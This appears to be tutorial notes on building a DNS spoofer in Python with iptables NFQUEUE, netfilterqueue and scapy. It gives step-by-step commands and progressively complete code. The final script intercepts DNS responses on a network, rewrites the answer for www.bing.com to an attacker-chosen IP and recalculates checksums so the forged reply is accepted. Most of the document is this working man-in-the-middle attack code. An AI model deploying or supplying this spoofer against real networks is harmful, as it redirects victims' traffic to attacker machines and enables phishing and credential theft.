WRITING A DNS SPOOFER

#DNS SERVER

SERVER: A server is a computer like the one you have; the only difference is that it has more data, resources and programs.

EXPLANATION: If a user searches for facebook.com, the request goes to the DNS server, which converts facebook.com to the IP address of Facebook so that the computer can read it. The computer then goes to the Facebook web server, accesses the data and gives it to the user.

#DNS SPOOFING: ROLE-OF-MITM

EXPLANATION: If a user searches for facebook.com, the request goes to the HACKER's computer, and the HACKER can replace the IP with an IP of his choice.

#INTERCEPTING PACKET

IPTABLE: Simply put, iptables is a firewall program for Linux. It will monitor traffic from and to your server using tables. These tables contain sets of rules, called chains, that will filter incoming and outgoing data packets.

# RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0

# TO CLEAR IP-TABLE: iptables --flush

# INSTALL NET-FILTER: pip install netfilterqueue

# CODE: /NOT/ALLOW INTERNET TO FLOW!/NET-CUT

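    #!/usr/bin/env python
    import netfilterqueue


    def process_packet(packet):
        # Called for every packet that iptables placed in queue 0
        print(packet)
        # accept() forwards the packet; drop() would discard it instead (net cut)
        packet.accept()


    # Attach to NFQUEUE number 0 (matches --queue-num 0) and start processing
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()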


# READING-DATA/CONVERTING PACKET TO SCAPY PACKETS

WE ARE GETTING DATA IN THE FORM OF A PACKET.
SO TO CONVERT THE PACKET INTO READABLE DATA WE USE
get_payload() [GIVES LESS READABLE DATA]

BUT THE RESULT IS UNREADABLE, SO WE CONVERT
get_payload() ---> SCAPY

WHY DO WE CONVERT INTO SCAPY?
BECAUSE BY USING .show() [WHICH WE CAN ONLY USE IN SCAPY]
WE CAN FIND THE LAYERS/FIELDS...
AS WE DID IN THE PACKET SNIFFER.

# CODE: PACKET-->DATA-->READABLE-DATA(SCAPY)

    #!/usr/bin/env python
    import netfilterqueue
    import scapy.all as scapy


    def process_packet(packet):
        # Wrap the raw payload in a scapy IP packet so its layers can be read
        scapy_packet = scapy.IP(packet.get_payload())
        # show() prints the layers and fields itself
        scapy_packet.show()
        packet.accept()


    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

# FILTERING DNS RESPONSES


#FOR-REMOTE-PC
-RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
-RUN: iptables -I INPUT -j NFQUEUE --queue-num 0

#FOR-LOCAL-PC
-RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0

#SITE-NAME!
-RUN: ping -c 1 www.bing.com

# CODE: FOR WEB IP-
    #!/usr/bin/env python
    import netfilterqueue
    import scapy.all as scapy


    def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        # Only DNS responses carry a DNSRR (resource record) layer
        if scapy_packet.haslayer(scapy.DNSRR):
            scapy_packet.show()
        # Forward every packet, DNS response or not
        packet.accept()


    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()

# MITM-CHANGING IP OF THE WEBSITE
# MODIFYING PACKET-IN-DNS-LAYER

# CODE: FOR WEB IP-
    #!/usr/bin/env python
    import netfilterqueue
    import scapy.all as scapy


    def process_packet(packet):
        # Convert the raw queued packet into a scapy packet
        scapy_packet = scapy.IP(packet.get_payload())

        # Only DNS responses carry a DNSRR (resource record) layer
        if scapy_packet.haslayer(scapy.DNSRR):
            qname = scapy_packet[scapy.DNSQR].qname

            # qname is a bytes object under Python 3
            if b"www.bing.com" in qname:
                print("[+] Spoofing target")

                answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
                scapy_packet[scapy.DNS].an = answer
                scapy_packet[scapy.DNS].ancount = 1

                # Remove lengths and checksums so scapy recalculates them
                del scapy_packet[scapy.IP].len
                del scapy_packet[scapy.IP].chksum
                del scapy_packet[scapy.UDP].chksum
                del scapy_packet[scapy.UDP].len

                # set_payload() expects bytes
                packet.set_payload(bytes(scapy_packet))

        packet.accept()


    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()


